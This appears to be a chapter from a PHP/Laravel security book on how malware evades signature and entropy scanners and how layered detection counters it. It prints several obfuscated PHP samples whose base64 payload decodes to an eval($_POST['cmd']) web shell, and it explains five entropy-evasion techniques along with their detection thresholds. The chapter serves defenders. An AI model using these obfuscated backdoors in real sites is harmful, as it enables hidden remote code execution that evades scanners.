πŸ”’ Hacked
Chapter 5

Beyond signatures: How modern malware evades detection

In Chapter 4, we explored 87 malware signatures. You might think that’s enough to catch most threats. It’s not.

Modern attackers know what security scanners look for. They’ve studied signature databases, analyzed detection algorithms, and developed sophisticated techniques to fly under the radar. This chapter reveals those techniques - and how to defeat them.

The signature problem

Traditional scanners work like this:

1. Load signature database (patterns like "eval(base64_decode(")
2. Read each file
3. Match patterns against content
4. If match found β†’ flag as malware

This approach has a fundamental flaw: attackers can read the same signature databases.

πŸ’€

The Arms Race

Every public signature database is a roadmap for attackers. For each signature published, attackers develop two new evasion techniques. This is why signature-only scanners are fighting a losing battle.

What Attackers Do

When an attacker wants to evade eval(base64_decode( detection:

// Original (detected)
eval(base64_decode('ZWNobyAiaGFja2VkIjs='));

// Evasion v1: Variable indirection
$f = 'base64_decode';
$e = 'eval';
$e($f('ZWNobyAiaGFja2VkIjs='));

// Evasion v2: String building
$func = 'bas'.'e64'.'_de'.'code';
$exec = 'ev'.'al';
$exec($func('ZWNobyAiaGFja2VkIjs='));

// Evasion v3: Array chunks (defeats even v2 signatures)
$c = ['ZWNo', 'byAi', 'aGFj', 'a2Vk', 'Ijs='];
$f = implode('', array_map('chr', [98,97,115,101,54,52,95,100,101,99,111,100,101]));
$e = implode('', array_map('chr', [101,118,97,108]));
$e($f(implode('', $c)));

Each version evades more signatures while doing the exact same thing. The behavior is identical; the appearance is different.


Enter entropy analysis

Entropy is a measure of randomness or unpredictability in data. It’s borrowed from information theory - specifically, Shannon entropy.

4.5-5.5
Normal PHP Entropy
5.8+
Obfuscated Code
<4.0
Padded/Evasion

Understanding Entropy Intuitively

Think of entropy as measuring β€œsurprise”:

Normal PHP code has medium entropy (4.5-5.5 on a 0-8 scale) because:

Base64-encoded malware has high entropy (5.8+) because:

Shannon Entropy Formula
H(X) = -Ξ£ p(x) Γ— logβ‚‚(p(x))

Where:

- H(X) = entropy of the data
- p(x) = probability of character x appearing
- Ξ£ = sum over all unique characters

For a file with 256 unique byte values appearing equally:
H = -256 Γ— (1/256 Γ— logβ‚‚(1/256)) = 8 bits (maximum entropy)

Why Attackers Fear Entropy Scanners

Early entropy scanners caught obfuscated malware easily:

File: malicious.php
Global Entropy: 6.7 (HIGH - SUSPICIOUS)
β†’ Flag for review

But attackers adapted. They developed entropy evasion techniques - ways to artificially lower their malware’s entropy to look like normal code.


The 5 entropy evasion techniques

Through extensive research, we’ve identified five primary techniques attackers use to manipulate entropy:

TechniqueMethodEffect on Entropy
Comment PaddingAdd voluminous repetitive commentsLowers global entropy
Variable Name EngineeringUse predictable, long variable namesLowers character diversity
Chunked PayloadSplit payload into small piecesDistributes high-entropy regions
String SteganographyHide data in invisible charactersAdds entropy invisibly
Whitespace ManipulationAdd excessive whitespaceDilutes entropy calculation

Let’s examine each one in detail.


Technique 1: Comment padding

Goal: Dilute high-entropy payload with low-entropy comments.

Comment Padding Evasion MALICIOUS CODE
<?php
/*
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* This is a legitimate configuration file for the application.
* [... 500 more identical lines ...]
*/

// Configuration settings
// Configuration settings
// Configuration settings

$c = base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=');
eval($c);

/*

- End of configuration file.
- End of configuration file.
- End of configuration file.
- End of configuration file.
*/

Why it works: The malicious payload is 2 lines. The padding is 1000+ lines of repetitive, low-entropy text. The global entropy of the file drops from 6.5 to 4.8 - appearing normal.

Detection: CommentPaddingDetector

We counter this by comparing entropy with and without comments:

IndicatorThresholdWhat It Means
Entropy delta> 1.5Big difference with/without comments
Comment ratio> 60%File is mostly comments
Repetition score> 40%Same lines repeated
Vocabulary ratio< 15%Very few unique words
// Detection logic
$entropyWithComments = calculateEntropy($content);
$entropyWithout = calculateEntropy(stripComments($content));
$delta = $entropyWithout - $entropyWithComments;

if ($delta > 1.5) {
    // Comments are artificially lowering entropy
    // Investigate the non-comment code!
}
ℹ️

Real Detection Numbers

In our implementation, we require at least 2 indicators with combined confidence above 40% before flagging. This prevents false positives on legitimately well-documented code.


Technique 2: Variable name engineering

Goal: Use predictable, long variable names to lower character diversity.

Variable Name Engineering MALICIOUS CODE
<?php
$temporaryDataBufferStorageVariableOne = 'ZX';
$temporaryDataBufferStorageVariableTwo = 'Zh';
$temporaryDataBufferStorageVariableThree = 'bC';
$temporaryDataBufferStorageVariableFour = 'gk';
$temporaryDataBufferStorageVariableFive = 'X1';
$temporaryDataBufferStorageVariableSix = 'BP';
$temporaryDataBufferStorageVariableSeven = 'U1';
$temporaryDataBufferStorageVariableEight = 'Rb';
$temporaryDataBufferStorageVariableNine = 'J2';
$temporaryDataBufferStorageVariableTen = 'Nt';

$resultOutputDataString =
$temporaryDataBufferStorageVariableOne .
$temporaryDataBufferStorageVariableTwo .
$temporaryDataBufferStorageVariableThree .
/_ ... continues ... _/;

$executionFunctionVariable = 'eval';
$decodeFunctionVariable = 'base64_decode';
$executionFunctionVariable($decodeFunctionVariable($resultOutputDataString));

Why it works: The long, repetitive variable names add predictable characters. Words like β€œtemporary”, β€œData”, β€œBuffer”, β€œStorage”, β€œVariable” appear constantly, lowering entropy.

Detection: VariableNameEngineeringDetector

IndicatorThresholdWhat It Means
Average length> 25 charsUnusually long variable names
Very long count> 3 variables over 40 charsPadding behavior
Sequential patterns> 5 numbered vars$var1, $var2, $var3…
Repetitive affixes> 40% same suffix/prefixSame endings/beginnings

Known padding words we look for:

When these words appear repeatedly in variable names, suspicion increases.


Technique 3: Chunked payload distribution

Goal: Break high-entropy payload into small chunks that individually appear normal.

Chunked Payload Attack MALICIOUS CODE
<?php
// Looks like configuration data
$config = [];
$config[] = 'ZX';
$config[] = 'Zh';
$config[] = 'bC';
$config[] = 'gk';
$config[] = 'X1';
$config[] = 'BP';
$config[] = 'U1';
$config[] = 'RF';
$config[] = 'J2';
$config[] = 'Nt';
$config[] = 'ZC';
$config[] = 'dd';
$config[] = 'XS';
$config[] = 'k7';

// Reconstruction - the dangerous part
$payload = implode('', $config);
$fn = chr(101).chr(118).chr(97).chr(108); // "eval"
$fn(base64_decode($payload));

Why it works: Each 2-character chunk has low entropy. A sliding window of 256 bytes won’t see a concentrated high-entropy region. The payload is distributed across the file.

Detection: ChunkedPayloadDetector

We look for the reconstruction patterns:

PatternDescriptionConfidence
Array building$arr[] = 'xx'; repeated70%
implode + evalReconstruction into execution95%
implode + base64_decodeDecoding reconstructed string90%
chr() chainsBuilding strings from ASCII85%
Uniform string lengthsAll strings same size70%
// Key detection patterns
$dangerousReconstruction = [
    'base64_chunks' => '/base64_decode\s*\(\s*implode/',
    'gzinflate_chunks' => '/gzinflate\s*\(\s*implode/',
    'chr_building' => '/chr\s*\(\s*\d+\s*\)\s*\.\s*chr/',
];
🚨

AI Polymorphism Uses This

AI-generated malware heavily uses chunked payloads because each instance can have a different chunk order, different array variable names, and different reconstruction methods. This is why we focus on detecting the reconstruction, not the chunks themselves.


Technique 4: String steganography

Goal: Hide data using invisible Unicode characters or look-alike characters.

Invisible Characters

These Unicode characters are invisible but present in the string:

CharacterUnicodeName
​U+200BZero Width Space
β€ŒU+200CZero Width Non-Joiner
‍U+200DZero Width Joiner
ο»ΏU+FEFFByte Order Mark
Β­U+00ADSoft Hyphen
⁠U+2060Word Joiner
Invisible Character Encoding MALICIOUS CODE
<?php
// Looks like a normal string, but contains hidden data
$message = "Helloβ€‹β€Œβ€β€‹β€‹β€Œβ€Œβ€‹World";  // ZWSP patterns encode binary

// Decoder extracts binary from invisible char positions
$binary = '';
for ($i = 0; $i < strlen($message); $i++) {
  $char = mb_substr($message, $i, 1);
  if ($char === "​") $binary .= '0';
  if ($char === "β€Œ") $binary .= '1';
}
// $binary could be: "01001000" = 'H' = start of payload

Homoglyphs

Characters from different scripts that look identical:

LatinCyrillicThey Look The Same
aΠ°Yes
eΠ΅Yes
oΠΎYes
cсYes
pΡ€Yes

An attacker could write Π΅val (Cyrillic β€˜Π΅β€™) instead of eval (Latin β€˜e’). Signature scanners looking for eval won’t match, but PHP might still execute it.

Detection: StringSteganographyDetector

We scan for:


Technique 5: Whitespace manipulation

Goal: Pad file with whitespace to dilute entropy.

Whitespace Padding MALICIOUS CODE
<?php

eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));

                                                          

Why it works: Whitespace characters (space, tab, newline) have low entropy because they’re all similar. Adding 90% whitespace drops global entropy significantly.

Detection: WhitespaceManipulationDetector

IndicatorThresholdMeaning
Whitespace ratio> 40%File is mostly whitespace
Entropy delta> 2.0Big difference with/without whitespace
Blank line ratio> 30%Too many empty lines
Consecutive blanks> 10Suspicious padding
Low entropy regions> 3 windowsConcentrated whitespace areas

The power of sliding window analysis

Global entropy can be manipulated. Local entropy is harder to fake.

Sliding window analysis divides a file into overlapping chunks and measures each one’s entropy:

File: malicious_padded.php (10000 bytes)

Sliding Window Configuration:
- Window size: 256 bytes
- Step: 64 bytes
- Windows analyzed: ~155

Results:
Window 0-256:    Entropy 3.2 (comments/padding)
Window 64-320:   Entropy 3.4 (comments/padding)
Window 128-384:  Entropy 3.5 (comments/padding)
...
Window 4096-4352: Entropy 6.8 ← ANOMALY! Hidden payload
Window 4160-4416: Entropy 6.7 ← ANOMALY!
...
Window 9800-10000: Entropy 3.1 (comments/padding)

Global Entropy: 4.2 (appears normal)
But: Local anomalies detected at byte 4096-4500

The global entropy looks normal (4.2), but the sliding window reveals a high-entropy region in the middle - that’s where the malicious payload is hidden.

Z-Score Anomaly Detection

We use statistical z-scores to find outliers:

// Calculate mean and standard deviation of all windows
$mean = average($windowEntropies);
$stdDev = standardDeviation($windowEntropies);

// Any window more than 2 standard deviations from mean is anomalous
foreach ($windows as $window) {
    $zScore = abs($window['entropy'] - $mean) / $stdDev;
    if ($zScore > 2.0) {
        // This region is statistically abnormal
        flagAsAnomaly($window);
    }
}

Behavioral analysis: The future

Signatures tell us what code looks like. Behavioral analysis tells us what code does.

βœ…

The Key Insight

No matter how an attacker obfuscates eval($_POST['cmd']), the behavior is the same: user input flows to a code execution function. We should detect the flow, not the appearance.

Data Flow Tracking

Instead of pattern matching, we track how data moves:

User Input Source        β†’  Transformation  β†’  Dangerous Sink
─────────────────────────────────────────────────────────────
$_GET['x']               β†’  base64_decode   β†’  eval()
$_POST['data']           β†’  decrypt()       β†’  unserialize()
$_REQUEST['cmd']         β†’  (none)          β†’  system()
$_COOKIE['token']        β†’  gzinflate()     β†’  assert()

If data flows from any user input to any dangerous sink, we flag it - regardless of how the code looks.

Why This Defeats AI Polymorphism

AI-generated malware changes its appearance every 15-60 seconds:

But the behavior stays the same. The malware still needs to:

  1. Receive attacker commands (input)
  2. Execute those commands (sink)

Behavioral analysis catches every variant.


Weighted scoring: Combining everything

No single technique is perfect. We combine multiple signals:

ComponentWeightWhat It Measures
Signature matches35%Known malware patterns
Behavioral analysis25%Data flow to dangerous sinks
Entropy analysis15%Statistical anomalies
Structural analysis10%Code structure oddities
Context analysis15%File location, naming

Context Modifiers

Not all detections are equal. We adjust scores based on context:

ContextModifierReason
vendor/-40%Third-party code, expected patterns
storage/framework/views/-50%Compiled Blade templates
bootstrap/cache/-45%Framework cache files
public/uploads/+40%PHP shouldn’t be here
.hidden/+35%Suspicious directory
Random filename+20%x7kd92.php is suspicious

Confidence Thresholds

Based on final score, we recommend actions:

ConfidenceActionAutomated?
β‰₯ 85%QUARANTINE - Move to isolation, alert adminYes
65-84%REVIEW - Flag for manual inspectionNo
40-64%MONITOR - Add to watchlistNo
< 40%CLEAN - No action needed-

The 15-dimensional feature vector

For advanced analysis, we compute 15 statistical features:

Entropy Features (3)

Character Distribution (4)

Code Metrics (3)

String Analysis (2)

Function Analysis (3)

This 15-dimensional vector provides a fingerprint of the file that’s difficult to manipulate without changing actual behavior.


Practical implementation

Here’s how our detection pipeline works:

Input: suspicious.php
         β”‚
         β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  1. Quick Filters           β”‚  Skip: >1MB, non-PHP, vendor/
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
               β”‚
               β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  2. Signature Scan          β”‚  87 patterns from Chapter 4
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
               β”‚
               β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  3. Entropy Analysis        β”‚  5 evasion detectors
β”‚  β”œβ”€ CommentPadding          β”‚
β”‚  β”œβ”€ VariableNameEngineering β”‚
β”‚  β”œβ”€ ChunkedPayload          β”‚
β”‚  β”œβ”€ StringSteganography     β”‚
β”‚  └─ WhitespaceManipulation  β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
               β”‚
               β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  4. Behavioral Analysis     β”‚  Data flow tracking
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
               β”‚
               β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  5. Weighted Scoring        β”‚  Combine all signals
β”‚  + Context Modifiers        β”‚  Adjust for location
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
               β”‚
               β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  6. Recommendation          β”‚  QUARANTINE/REVIEW/MONITOR/CLEAN
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Summary

Signatures are necessary but insufficient. Modern malware uses sophisticated evasion techniques:

5
Evasion Techniques
15
Statistical Features

Key takeaways:

  1. Comment padding, variable engineering, and whitespace manipulation artificially lower entropy
  2. Chunked payloads distribute high-entropy content across the file
  3. String steganography hides data in invisible characters
  4. Sliding window analysis catches local anomalies even when global entropy looks normal
  5. Behavioral analysis detects what code does, not what it looks like
  6. Weighted scoring combines multiple signals for accurate detection
  7. Context modifiers prevent false positives in legitimate framework code

The lesson is clear: layers of defense, not single techniques.


Next: Chapter 6 - The 12 CVEs Every Laravel Developer Must Know

Entropy analysis catches obfuscation. But what about vulnerabilities in Laravel itself? The next chapter covers the critical CVEs every Laravel developer must patch.